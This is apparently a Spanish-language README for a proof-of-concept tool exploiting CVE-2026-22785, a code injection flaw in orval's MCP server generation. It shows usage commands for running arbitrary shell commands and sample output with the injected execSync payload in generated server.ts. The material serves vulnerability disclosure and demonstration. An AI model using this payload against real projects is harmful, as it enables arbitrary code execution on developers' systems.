
Herramienta de explotación para CVE-2026-22785, una inyección de código crítica en orval < 7.18.0. Proporciona ejecución de comandos de shell y escaneo de archivos para demostrar la vulnerabilidad y verificar la inyección de payloads.
orval < 7.18.0, al generar código de servidor MCP, concatena directamente el campo summary de la especificación OpenAPI en la plantilla sin escapar, lo que provoca una inyección de código.
cd exploit
npm install
# Ejecutar comando (explotación de vulnerabilidad)
python cve_tool.py shell <comando>
# Ejemplo
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# Escanear archivo
python cve_tool.py scan <archivo>
<salida del comando>
[+] CVE-2026-22785: Inyección de payload exitosa
[+] Ubicación de la inyección: server.ts:31
Código generado en server.ts:
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);